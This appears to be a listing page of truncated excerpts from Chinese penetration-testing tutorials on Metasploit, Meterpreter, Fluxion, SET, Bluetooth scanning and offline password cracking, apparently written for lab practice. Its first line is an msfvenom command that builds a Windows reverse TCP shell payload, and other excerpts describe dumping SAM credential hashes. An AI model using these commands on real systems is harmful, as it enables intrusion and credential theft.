msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUN ...

本次用到的环境： kali(2016.2)32位系统.ip地址：192.168.1.104 目标靶机为：win7sp1x64系统（关闭防火墙），ip地址：192.168.1.105 === ...

在计算机行业，拒绝服务(DoS)或分布式拒绝服务(DDoS)攻击是指不法分子企图让某机器或网络资源无法被预期的用户所使用。虽然执行DoS攻击的方式、动机和目标不一样，但通常包括设法临时性或无限期中断或 ...

1．hcitool 通过前面讲的升级操作后，在BackTrack4 Linux或者Ubuntu系统下将会安装好蓝牙的全套操作工具，其中就包括hcitool。该工具支持大量的蓝牙设备操作，从扫描到查看 ...

在线密码攻击在渗透测试中很重要，但对于测试过程中得到的哈希，加密数据，又需要离线破解工具辅助解决 Creddump套件 kali下离线攻击工具中的Cache-dump ...

使用步骤 github地址 https://github.com/deltaxflux/fluxion 进入到fluxion目录下 ./fluxion 启动fluxion 启动之后会先检测没 ...

获取凭证 hashdump模块（post）可以从SAM数据库中导出本地用户账号，credential_collector脚本（post/windows/gather/credentials）也可以从 ...

由于是在虚拟机下实验，仅做示范 下载地址 git clone https://github.com/trustedsec/social-engineer-toolkit/ 终端输入s ...

十、Meterpreter常用命令 1、基本命令（包含meterpreter和msf终端、ruby接口、目标shell交互的命令） background（进程隐藏至后台） sessions（查看已经成 ...

Metasploit是一个免费的、可下载的渗透测试框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击测试。它本身附带数百个已知软件漏洞的专业级漏洞攻击测试工具。 当H.D. Moore在2 ...